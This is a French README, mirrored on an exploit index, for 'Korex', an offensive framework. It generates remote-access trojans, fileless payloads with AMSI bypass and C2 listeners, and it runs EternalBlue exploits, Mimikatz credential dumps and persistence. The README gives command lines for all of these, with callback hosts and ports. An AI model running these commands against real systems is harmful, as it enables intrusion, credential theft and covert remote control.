Share
## https://sploitus.com/exploit?id=5D0965E7-F627-5299-9315-FAB35F6549B6
⚡ KOREX FRAMEWORK ⚡
Advanced Security Operations Framework
"Korex ne remplace pas les outils Ă©tablis ; il en organise l’exploitation."




  



## 📋 TABLE DES MATIÈRES

- [🎯 PrĂ©sentation](#-prĂ©sentation)
- [✹ FonctionnalitĂ©s](#-fonctionnalitĂ©s)
- [📩 Architecture Modulaire](#-architecture-modulaire)
- [🐀 Types de RATs SupportĂ©s](#-types-de-rats-supportĂ©s)
- [🚀 Installation](#-installation)
- [📖 Utilisation](#-utilisation)
- [đŸ’» Mode Commande Unique](#-mode-commande-unique)
- [⚙ Configuration](#-configuration)
- [đŸ§Ș Tests & Laboratoires](#-tests--laboratoires)
- [📚 Documentation](#-documentation)
- [đŸ€ Contribution](#-contribution)
- [⚠ Avertissement LĂ©gal](#-avertissement-lĂ©gal)
- [📞 Contact](#-contact)


## 🎯 PRÉSENTATION

**Korex** est un framework offensif modulaire conçu pour **Kali Linux** et **Parrot Security OS**, spécialisé dans la génération de RATs (Remote Access Tools) et l'orchestration d'outils de cybersécurité existants.

Korex centralise et coordonne l’usage de plusieurs **outils offensifs reconnus**, en les intĂ©grant dans une interface unique conçue pour simplifier le pilotage des opĂ©rations.
**Le framework** peut ĂȘtre utilisĂ© de maniĂšre interactive ou via des commandes directes, selon les besoins opĂ©rationnels.


## ✹ FONCTIONNALITÉS

### 🔍 **Reconnaissance**
| Outils | Fonctionnalités |
|--------|-----------------|
| Nmap, Rustscan, Masscan | Scan de ports TCP/UDP |
| Scripts NSE | Détection de services et d'OS |
| Vuln scanners | Scan de vulnérabilités automatique |

### 💣 **Payload Factory**
| Outils | Capacités |
|--------|-----------|
| msfvenom, Donut | Génération de payloads multi-plateforme |
| Veil, Shellter | Obfuscation avancée |
| UPX, XOR | Compression et encodage |

### 🐀 **GĂ©nĂ©rateurs de RATs SpĂ©cialisĂ©s**

| Type | Description | Exemples |
|------|-------------|----------|
| **Traditionnels** | RATs User-mode avec interface graphique | DarkComet, njRAT, NanoCore, Quasar |
| **C2 Modernes** | Frameworks avec beaconing intelligent | Cobalt Strike, Metasploit, Sliver, Mythic |
| **Fileless** | RATs memory-resident sans fichier sur disque | PowerShell, WMI, Reflective DLL, .NET |

### 🎼 **C2 Controller**
- Gestion unifiée des listeners (Metasploit, Empire, Covenant)
- DĂ©marrage/arrĂȘt de listeners
- Configuration automatique des payloads

### 📊 **Session Aggregator**
- Vue unique de toutes vos sessions (Metasploit + Empire + Covenant)
- Interaction centralisée
- Upload/download de fichiers
- Screenshot Ă  distance

### ⚔ **Exploitation**
- Scan de vulnérabilités automatique
- Exploits intégrés (EternalBlue, BlueKeep)
- Brute-force (Hydra, Medusa)

### đŸ‘„ **Post-Exploitation**
- ÉnumĂ©ration avec winPEAS/linPEAS
- Dump de credentials (Mimikatz)
- BloodHound collector
- Persistance (registry, tĂąches, services, cron, SSH)

### 📑 **Report Engine**
- Rapports professionnels HTML, PDF, TXT, JSON
- Collecte automatique des données
- SynthÚse exécutive + détails techniques
- Recommandations de remédiation


## 🐀 TYPES DE RATS SUPPORTÉS

### đŸšïž **RATs Traditionnels (User-mode)**
| Caractéristiques | Templates |
|------------------|-----------|
| ✅ Interface graphique de contrîle | **DarkComet** - RAT complet avec nombreuses features |
| ✅ Communication TCP simple | **njRAT** - LĂ©ger et stable |
| ✅ Peu d'obfuscation | **NanoCore** - Modulaire avec plugins |
| ✅ Binaire classique (.exe) | **QuasarRAT** - Open source et chiffrĂ© |

### 🏱 **RATs C2 Modernes**

|     Framework     |            Caractéristiques          |
|-------------------|--------------------------------------|
| **Metasploit**    | Payloads Meterpreter, AES + XOR      |
| **Cobalt Strike** | Beacon, chiffrement AES256 + HMAC    |
| **Sliver**        | Implants multi-plateforme, WireGuard |
| **Mythic**        | Agents cross-platform, AES256 + ECC  |


### đŸ•łïž **RATs Fileless / Memory-Resident**

|      Technique     |            Description               |
|--------------------|--------------------------------------|
| **PowerShell**     | Exécution en mémoire, AMSI bypass    |
| **WMI**            | Persistance via Event Subscription   |
| **Reflective DLL** | Injection DLL sans écrire sur disque |
| **.NET Assembly**  | Load depuis la mémoire               |
| **Office Macro**   | VBA avec shellcode                   |


## 🚀 INSTALLATION

### Prérequis
- Kali Linux 2023+ ou Parrot OS 5.0+
- Python 3.8+
- 2 Go RAM minimum
- Connexion Internet

### Installation Automatique


# 1. Cloner le dépÎt
git clone https://github.com/Elfried002/KOREX.git
cd KOREX

# 2. Rendre le script exécutable
chmod +x install.sh

# 3. Lancer l'installation (root requis)
sudo ./install.sh

# 4. Vérifier l'installation
korex --check-deps

### Installation Manuelle

# 1. Copier les fichiers
sudo mkdir -p /usr/share/korex/{core,modules,utils,config,payloads,reports,loot,temp}
sudo cp -r * /usr/share/korex/

# 2. Installer les dépendances
sudo pip install -r requirements.txt
sudo apt install nmap metasploit-framework rustscan masscan hydra

# 3. Créer le lien symbolique
sudo ln -s /usr/share/korex/korex.py /usr/local/bin/korex
sudo chmod +x /usr/local/bin/korex

# 4. Compilateurs pour RATs C# (optionnel)
sudo apt install mono-complete

## 📖 UTILISATION

### Mode Interactif (par défaut)

sudo korex



    ═══════════════════════════════════════════════════════════
                         MAIN MENU                             
    ═══════════════════════════════════════════════════════════
                                                               
      [01] 🔍 RECONNAISSANCE     (Nmap, Rustscan, Masscan)    
      [02] 💣 PAYLOAD FACTORY     (GĂ©nĂ©rique - msfvenom)      
      [03] 🐀 RATS TRADITIONNELS  (DarkComet, njRAT style)    
      [04] 🎯 RATS C2 MODERNES    (Cobalt Strike, Sliver)     
      [05] đŸ•łïž  RATS FILELESS       (Memory-resident)           
      [06] 🎼 C2 CONTROLLER       (Metasploit, Empire)        
      [07] 📊 SESSION AGGREGATOR   (Voir toutes les sessions)  
      [08] ⚔  EXPLOITATION        (Auto-pwn, Brute-force)    
      [09] đŸ‘„ POST-EXPLOITATION   (Privesc, Persistence)      
      [10] 📑 REPORT ENGINE       (HTML, PDF, TXT)            
                                                               
      [08] ❓ HELP                (Documentation complùte)    
      [09] đŸšȘ EXIT                (Quitter Korex)             
                                                               
    ═══════════════════════════════════════════════════════════
    
Korex > 


Navigation par numéros ou mots-clés :
- `01` ou `recon` → Reconnaissance
- `02` ou `payload` → Payload Factory
- `03` ou `traditional` → RATs Traditionnels
- `04` ou `modern` → RATs C2 Modernes
- `05` ou `fileless` → RATs Fileless
- `06` ou `c2` → C2 Controller
- `07` ou `sessions` → Session Aggregator
- `08` ou `exploit` → Exploitation
- `09` ou `postex` → Post-Exploitation
- `10` ou `report` → Report Engine
- `08` ou `help` → Aide
- `09` ou `exit` → Quitter

## đŸ’» MODE COMMANDE UNIQUE

### Reconnaissance

korex recon --target 192.168.1.0/24 --quick
korex recon --target 10.0.0.1 --ports 80,443
korex recon --target example.com --os-detection

### RATs Traditionnels

# DarkComet style
korex traditional --template darkcomet --lhost 10.0.0.1 --lport 5555

# njRAT style avec persistence
korex traditional --template njrat --lhost 10.0.0.1 --lport 5556 --persist registry

# QuasarRAT style
korex traditional --template quasar --lhost 10.0.0.1 --lport 5557

### RATs C2 Modernes

# Metasploit avec beaconing
korex modern --framework metasploit --lhost 10.0.0.1 --lport 443 --beacon --sleep 5 --jitter 20

# Sliver implant
korex modern --framework sliver --lhost 10.0.0.1 --lport 8443

# Payload Metasploit reverse_https
korex modern --framework metasploit --lhost 10.0.0.1 --lport 8080 --type reverse_https

### RATs Fileless

# PowerShell avec AMSI bypass
korex fileless --technique powershell --lhost 10.0.0.1 --lport 8080 --amsi-bypass

# WMI persistence
korex fileless --technique wmi --lhost 10.0.0.1 --lport 8081

# Office Macro
korex fileless --technique macro --lhost 10.0.0.1 --lport 8082

### C2 Controller

korex c2 --list
korex c2 --start metasploit --lport 4444
korex c2 --stop MSF-01

### Sessions

korex sessions --list
korex sessions --interact MSF-01
korex sessions --interact MSF-01 --command "whoami"
korex sessions --upload /tmp/script.ps1:C:\\Windows\\Temp\\
korex sessions --kill all

### Exploitation

korex exploit --target 192.168.1.105 --vuln eternalblue --lhost 10.0.0.1
korex exploit --target 192.168.1.110 --bruteforce ssh


### Post-Exploitation

korex postex --session MSF-01 --module winpeas
korex postex --session MSF-01 --module mimikatz
korex postex --session MSF-01 --persist registry

### Rapports

korex report --format html --output rapport.html --collect
korex report --format pdf --output rapport.pdf --include all
korex report --format txt --output rapport.txt --title "Pentest Report"

### Aide

korex help                 # Aide générale
korex help recon           # Aide sur un module spécifique
korex help traditional     # Aide sur RATs traditionnels
korex --check-deps         # Vérifier les dépendances
korex --version            # Version


## ⚙ CONFIGURATION

### Fichiers de configuration
- **Globale** : `/etc/korex/korex.conf`
- **Utilisateur** : `~/.korex/config.conf`
- **Chemins des outils** : `/usr/share/korex/config/tools_paths.json`
- **Base de données d'aide** : `/usr/share/korex/config/help_database.json`

### Exemple de configuration

[GENERAL]
LANGUAGE = fr
COLORS = true
LOG_LEVEL = INFO

[PATHS]
PAYLOAD_DIR = /usr/share/korex/payloads
TRADITIONAL_PAYLOAD_DIR = /usr/share/korex/payloads/traditional
MODERN_PAYLOAD_DIR = /usr/share/korex/payloads/modern_c2
FILELESS_PAYLOAD_DIR = /usr/share/korex/payloads/fileless

[TRADITIONAL_RAT]
COMPILER = mcs
DEFAULT_TEMPLATE = darkcomet

[MODERN_RAT]
DEFAULT_FRAMEWORK = metasploit
DEFAULT_BEACON_SLEEP = 5
DEFAULT_BEACON_JITTER = 20

[FILELESS_RAT]
DEFAULT_TECHNIQUE = powershell
DEFAULT_AMSI_BYPASS = true


## đŸ§Ș TESTS & LABORATOIRES

### Environnements supportés

|        OS        |     Statut      |
|------------------|-----------------|
| Kali Linux 2023+ | ✅Full support  |
| Parrot OS 5.0+   | ✅ Full support |
| Ubuntu/Debian    | ⚠ Partiel      |
| Windows (WSL)    | ⚠ Partiel      |
| macOS            | ❌ Non supportĂ© |

### Plateformes recommandées
- ✅ HackTheBox
- ✅ TryHackMe
- ✅ Proving Grounds
- ✅ VulnHub
- ✅ Laboratoires personnels
- ✅ Missions de pentest avec contrat


## 📚 DOCUMENTATION

### Commandes utiles

# Aide intégrée
korex help
korex help traditional
korex help modern
korex help fileless

# Vérification
korex --check-deps
korex --version


## đŸ€ CONTRIBUTION

Les contributions sont les bienvenues ! Voici comment contribuer :

1. **Fork** le projet
2. Créer une branche (`git checkout -b feature/amazing-feature`)
3. **Commit** vos changements (`git commit -m 'Add amazing feature'`)
4. **Push** (`git push origin feature/amazing-feature`)
5. Ouvrir une **Pull Request**

### RĂšgles de contribution
- Code commenté en français ou anglais
- Respecter la structure existante
- Tester sur Kali Linux
- Documenter les nouvelles fonctionnalités

## ⚠ AVERTISSEMENT LÉGAL

**Korex est un outil de cybersécurité destiné à des fins éducatives et professionnelles dans un cadre légal.**

L'utilisation de ce logiciel pour accĂ©der Ă  des systĂšmes sans autorisation explicite est **ILLÉGALE** et peut entraĂźner des poursuites pĂ©nales.

### Usage autorisé
✅ Vos propres systùmes  
✅ Environnements de test avec autorisation  
✅ Missions de pentest avec contrat Ă©crit  
✅ Laboratoires d'apprentissage (CTF, HackTheBox, etc.)  

### Usage interdit
❌ AccĂšs non autorisĂ© Ă  des systĂšmes  
❌ Vol de donnĂ©es  
❌ Perturbation de services  
❌ ActivitĂ©s malveillantes  

**Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.**


## 📞 CONTACT

- **Auteur** : ELFried YOBOUET
- **GitHub** : [@Elfried002](https://github.com/Elfried002)
- **Email** : elfriedyobouet@gmail.com

## 🙏 REMERCIEMENTS

- L'équipe Metasploit
- Les développeurs de Empire
- La communauté Kali Linux
- Tous les contributeurs des outils utilisés
- Les testeurs et beta-users



  Korex – "The Core of Advanced Security Operations" đŸ”„
  
  © 2026 ELFried YOBOUET - Tous droits réservés



  Haut de page ‱
  GitHub ‱